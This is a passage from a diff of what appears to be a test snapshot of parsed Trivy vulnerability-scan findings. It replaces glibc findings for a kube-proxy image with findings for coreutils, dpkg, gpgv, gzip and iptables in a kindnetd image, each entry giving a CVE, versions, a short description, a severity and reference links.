"type": "URL", + "value": "http://seclists.org/oss-sec/2016/q1/452", + }, + { + "type": "URL", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + }, + { + "type": "URL", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "value": "https://lore.kernel.org/patchwork/patch/793178/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3326", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-18018", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", + "references": [ + "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "https://access.redhat.com/security/cve/CVE-2017-18018", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "https://www.cve.org/CVERecord?id=CVE-2017-18018", + ], + }, + "category": "Vulnerability", + "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "coreutils: race condition vulnerability in chown and chgrp", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "value": "https://avd.aquasec.com/nvd/cve-2017-18018", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", + "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://access.redhat.com/security/cve/CVE-2017-18018", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.20.10", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1664", + "installedVersion": "1.20.9", + "packageName": "dpkg", + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "https://security.netapp.com/advisory/ntap-20221007-0002/", + "https://ubuntu.com/security/notices/USN-5446-1", + "https://ubuntu.com/security/notices/USN-5446-2", + ], + }, + "category": "Vulnerability", + "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-1664", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", }, { "type": "URL", - "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://ubuntu.com/security/notices/USN-5446-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5446-2", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "2.2.27-2+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-34903", + "installedVersion": "2.2.27-2+deb11u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "https://access.redhat.com/errata/RHSA-2022:6602", + "https://access.redhat.com/security/cve/CVE-2022-34903", + "https://bugs.debian.org/1014157", + "https://bugzilla.redhat.com/2102868", + "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "https://dev.gnupg.org/T6027", + "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "https://errata.rockylinux.org/RLSA-2022:6602", + "https://linux.oracle.com/cve/CVE-2022-34903.html", + "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "https://security.netapp.com/advisory/ntap-20220826-0005/", + "https://ubuntu.com/security/notices/USN-5503-1", + "https://ubuntu.com/security/notices/USN-5503-2", + "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "https://www.debian.org/security/2022/dsa-5174", + "https://www.openwall.com/lists/oss-security/2022/06/30/1", ], }, "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "name": "Signature spoofing via status line injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "value": "https://avd.aquasec.com/nvd/cve-2022-34903", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://access.redhat.com/errata/RHSA-2022:6602", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://access.redhat.com/security/cve/CVE-2022-34903", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://bugs.debian.org/1014157", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://bugzilla.redhat.com/2102868", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://dev.gnupg.org/T6027", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://errata.rockylinux.org/RLSA-2022:6602", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-10228", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://openwall.com/lists/oss-security/2017/03/01/10", - "http://www.securityfocus.com/bid/96525", - "https://access.redhat.com/security/cve/CVE-2016-10228", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", - "https://linux.oracle.com/cve/CVE-2016-10228.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2016-10228", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: iconv program can hang when invoked with the -c option", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-10228", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/03/01/10", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/96525", + "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-10228", + "value": "https://ubuntu.com/security/notices/USN-5503-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "value": "https://ubuntu.com/security/notices/USN-5503-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://www.debian.org/security/2022/dsa-5174", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3219", + "installedVersion": "2.2.27-2+deb11u1", + "packageName": "gpgv", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-3219", + "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "https://dev.gnupg.org/D556", + "https://dev.gnupg.org/T5993", + "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "https://security.netapp.com/advisory/ntap-20230324-0001/", + "https://www.cve.org/CVERecord?id=CVE-2022-3219", + ], + }, + "category": "Vulnerability", + "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "denial of service issue (resource consumption) using compressed packets", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-3219", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "value": "https://access.redhat.com/security/cve/CVE-2022-3219", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://dev.gnupg.org/D556", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://dev.gnupg.org/T5993", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-25013", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1.10-4+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "1.10-4", + "packageName": "gzip", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-25013", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - "https://linux.oracle.com/cve/CVE-2019-25013.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210205-0004/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2019-25013", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", ], }, "category": "Vulnerability", - "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", + "name": "arbitrary-file-write vulnerability", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-25013", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-10029", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "iptables", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", - "https://access.redhat.com/security/cve/CVE-2020-10029", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", - "https://linux.oracle.com/cve/CVE-2020-10029.html", - 